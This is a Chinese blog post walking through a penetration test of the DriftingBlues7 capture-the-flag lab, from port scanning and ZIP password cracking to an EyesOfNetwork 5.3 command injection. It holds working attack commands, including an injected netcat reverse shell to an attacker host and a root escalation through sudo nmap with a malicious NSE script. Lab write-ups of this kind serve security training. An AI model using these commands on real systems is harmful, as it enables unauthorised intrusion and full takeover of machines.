driftingblues7_vh 渗透测试报告

1. 信息收集

1.1 主机发现

nmap -sn 192.168.242.0/24

发现目标IP:192.168.242.190

1.2 端口扫描与服务识别

nmap -sV -p- 192.168.242.190

扫描结果:

端口 服务 版本
22 SSH OpenSSH 7.4
66 HTTP SimpleHTTPServer 0.6 (Python 2.7.5)
80 HTTP Apache 2.4.6
111 rpcbind 2-4
443 HTTPS Apache 2.4.6
2403 taskmaster2000? 未知
3306 MySQL MariaDB 10.3.23或更早
8086 HTTP InfluxDB http admin 1.7.9

2. Web枚举

2.1 端口66目录爆破

gobuster dir -u http://192.168.242.190:66/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,bak,txt \
  --exclude-length 244 \
  --status-codes 200,204,301,302,307,403

发现路径:

  • /flag.txt (Status: 200)
  • /index_files/ (Status: 301)
  • /eon (Status: 200)

2.2 访问关键路径

2.2.1 /eon 路径

获取到Base64编码数据:

UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU
Rw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA
AABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA
AQBbAAAARgAAAAAA

3. 凭证提取

3.1 解码与解压

  1. Base64解码后得到ZIP文件
  2. 使用zip2john提取哈希:
zip2john ctool-2025-12-21-02-32-15.zip > hash
  1. 破解ZIP密码:
john hash

破解结果: 密码为 killah

3.2 获取凭证

解压后得到creds.txt,内容为:

admin
isitreal31__

4. 漏洞利用

4.1 搜索公开漏洞

searchsploit EyesOfNetwork 5.3

发现多个相关漏洞:

  • File Upload RCE (49432.sh)
  • LFI (49404.txt)
  • RCE & PrivEsc (49402.txt)
  • Remote Code Execution (48025.txt)

4.2 利用RCE漏洞

访问漏洞URL:

https://192.168.242.190/module/module_frame/index.php?url=/lilac/autodiscovery.php

在"Add Target"处执行命令:

127.0.0.1 & nc -e /bin/sh 192.168.242.128 1234

4.3 建立反向Shell

监听端口:

nc -lvnp 1234

成功获得apache用户shell。

5. 权限提升

5.1 检查sudo权限

sudo -l

输出:

User apache may run the following commands on driftingblues:
    (root) NOPASSWD: /bin/systemctl * snmptt, 
        /bin/systemctl * snmptrapd,
        /bin/systemctl * snmpd, 
        /bin/systemctl * nagios, 
        /bin/systemctl * gedd,
        /usr/bin/nmap

5.2 Nmap提权

  1. 创建恶意NSE脚本:
echo 'os.execute("/bin/sh")' > /tmp/rootshell.nse
  1. 以root权限执行nmap:
sudo nmap --script=/tmp/rootshell.nse
  1. 成功获得root shell:
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

6. 获取Flag

cat flag.txt

Flag内容:

flag 1/1
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

7. 攻击链总结

  1. 信息收集:发现开放端口66上的HTTP服务
  2. 目录枚举:找到/eon路径包含Base64编码的ZIP文件
  3. 凭证提取:破解ZIP密码获取EyesOfNetwork管理员凭证
  4. 漏洞利用:利用EyesOfNetwork 5.3的RCE漏洞获取初始立足点
  5. 权限提升:利用apache用户的sudo权限通过nmap脚本执行获得root权限
  6. 目标达成:读取flag完成渗透测试

关键漏洞点:

  • EyesOfNetwork 5.3未经认证的RCE
  • 配置不当的sudo权限允许apache用户以root身份执行nmap
posted @ 2026-01-12 15:25  敬畏虚空  阅读(2)  评论(0)    收藏  举报